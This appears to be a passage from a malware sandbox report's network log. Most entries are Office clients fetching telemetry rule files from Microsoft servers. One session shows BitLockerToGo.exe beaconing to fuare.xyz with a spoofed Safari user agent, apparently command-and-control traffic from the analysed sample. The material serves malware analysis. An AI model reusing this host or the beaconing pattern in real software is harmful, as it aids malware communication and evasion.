                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        123192.168.2.54983213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1388
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9bdc8c39-b01e-003d-1ed2-2cd32c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142542Z-16547b76f7f22sh5hC1DFWyb4w0000000km000000000hdr1
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        124192.168.2.54983313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9c6e6586-601e-0097-55a1-34f33a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142542Z-1749fc9bdbdlzhmchC1DFWe68s00000002dg00000000gswf
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        125192.168.2.54983413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1378
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 71af9553-101e-00a2-14d2-2c9f2e000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142542Z-16547b76f7fnlcwwhC1DFWz6gw0000000ku000000000g9t3
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        126192.168.2.54983513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 2200add1-e01e-0071-45a6-3408e7000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142543Z-r178fb8d765th6bkhC1DFWr7h000000002n000000000nzmq
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        127192.168.2.54983713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: f826ff35-b01e-00ab-80a6-34dafd000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142543Z-1749fc9bdbdgs9sshC1DFWt6ws00000002vg0000000000n8
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        128192.168.2.54983813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e4621776-701e-0053-5181-353a0a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142543Z-1749fc9bdbdwv5sghC1DFWwp6n00000002d000000000g2d3
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                        129192.168.2.549836116.203.0.1594436152C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC224OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                                                        Host: fuare.xyz
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        130192.168.2.54983913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1378
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 318e9082-a01e-0070-08a8-34573b000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142543Z-1749fc9bdbd4dqj6hC1DFWr4n400000002k000000000hsp4
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        131192.168.2.54984013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1407
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
